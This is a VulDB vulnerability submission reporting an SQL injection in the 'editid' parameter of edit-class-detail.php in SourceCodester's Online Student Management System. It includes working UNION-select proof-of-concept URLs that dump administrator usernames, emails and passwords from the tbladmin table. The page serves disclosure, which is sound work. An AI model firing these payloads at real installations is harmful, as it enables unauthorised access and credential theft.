Soumettre #95872: eduAuthorities sql Injectioninformation

Titre	eduAuthorities sql Injection
Description	Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html Version environment: php=7.3.4 Mysql=5.7.26 Apache=2.4.39 Preparation: Create a "student" database in mysql. Set the database username and password in "dbconnection.php", and then access http://localhost/eduauth/index.php to log in with the account and password. Vulnerability: http://localhost/eduauth/edit-class-detail.php?editid=1 On line 54 of the "edit-class-detail.php" file, the parameter "editid" is not filtered and can be directly exploited. http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin# You can see that data information is returned. Poc: http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin# Vulnerability principle: Check the "edit-class-edit-detail.php" file. On line 55, the user input parameter "editid" is directly concatenated into the SQL statement, and on line 57, a query is performed.
Utilisateur	0chen (UID 41914)
Soumission	28/02/2023 08:35 (il y a 3 ans)
Modérer	28/02/2023 21:03 (12 hours later)
Statut	Accepté
Entrée VulDB	222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid injection SQL]
Points	17

Do you know our Splunk app?

Download it now for free!